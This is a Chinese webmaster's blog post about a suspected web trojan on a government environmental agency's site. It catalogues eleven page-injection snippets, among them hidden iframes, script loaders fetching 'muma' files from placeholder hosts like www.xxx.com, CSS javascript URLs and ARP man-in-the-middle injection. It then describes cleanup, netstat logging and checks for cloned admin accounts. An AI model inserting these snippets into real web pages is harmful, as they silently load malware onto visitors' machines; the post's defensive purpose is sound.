【标题】国家环保总局官方网站疑似被挂马—网页木马
【内容】

         前段时间，我们的品牌通 联系通 等网站相继遭遇网页木马，深受其害。今天，无意中发现国家环保总局官方网站疑似被挂马。

 现象截图：
  
          

网页木马相关技术总结：

网页木马代码大全：

一:框架挂马

   <iframe src=地址 width=0 height=0></iframe>

二:js文件挂马
  
   首先将以下代码
   document.write("<iframe width='0' height='0' src='地址'></iframe>");
   保存为xxx.js，
   则JS挂马代码为
   <script language=javascript src=xxx.js></script>

三:js变形加密
  
   <SCRIPT language="JScript.Encode"          src=http://www.xxx.com/muma.txt></script>
   muma.txt可改成任意后缀
四:body挂马

   <body onload="window.location='地址';"></body>

五:隐蔽挂马

   top.document.body.innerHTML = top.document.body.innerHTML +    '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

   body {
   background-image: url('javascript:document.write("<script          src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

  <SCRIPT language=javascript>      
  window.open  ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro  llbars=no,width=1,height=1");  
  </script>

八:图片伪装

  <html>
  <iframe src="网马地址" height=0 width=0></iframe>
  <img src="图片地址"></center>
  </html>

九:伪装调用：

   <frameset rows="444,0" cols="*">
   <frame src="打开网页" framborder="no" scrolling="auto" noresize    marginwidth="0"margingheight="0">
   <frame src="网马地址" frameborder="no" scrolling="no"   noresize    marginwidth="0"margingheight="0">
   </frameset>

十:高级欺骗

   <a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马 

原理：arp中间人攻击，实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马：

1、找到嵌入的网页木马文件。以下，拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运，找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸，又查到了。说明有服务程序在作怪。嘿嘿，有意外发现。
  cain.exe，据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe，仍然可以查到。嘻嘻，在预料之中。

7、怀疑wm.htm与cain.exe同流合污，背后有服务程序作后台。

8、快查查看，系统服务程序。在运行->msconfig 或直接在命令行使用net start，查看可疑程序

9、发现temp*.exe（全名记不清了），立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm，cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈，很好。

12、观察了几天，没再发生挂马的现象。

另外，通过检测网络连接查看服务器是否中了木马或病毒

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息，可以完全监控计算机上的连接，从而达到控制计算机的目的。

3、手工制作bat程序，生成网络连接日志文件供站长分析：bat文件代码如下

 REM 注释：监控的时间
 time /t>>Netstat.log
 REM 每隔30秒，把服务器上通过tcp协议通讯的IP和端口写入日志文件
 Netstat -n -p tcp 30>>Netstat.log
 
 注意：要谨慎使用，这会给服务器带来性能影响。最好，在服务器发生异常，怀疑中木马或病毒时，用来分析网络连接日志。
 
仅仅这些还不够，说说更严重的：

1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户，但这个账户是不经常用的， 然后使用工具把这个账户提升到管理员权限，从表面上看来这个账户还是和原来一样，但是这个克隆的账户却是系统中最大的安全隐患。
 
2、赶快检测系统帐户：
 a、在命令行下输入net user，查看计算机上有些什么用户。
 b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
 c、一般除了Administrator是administrators组的，如果你发现一个系统内置的用户是属于administrators组的，
    那么别人在你的计算机上克隆账户的概率为90%。
 d、是使用“net user 用户名 /del” 来删掉这个用户，还是修改其它配置，这你说了算。

 当然，仅靠这些方法还远远不够。在此，倡议站长为网马反击战献计献策，把预防，处理，反击网马的经验拿给大家分享。谢谢！
 
 【关键词】网页木马 网页木马代码大全 如何处理网页木马 站长经验交流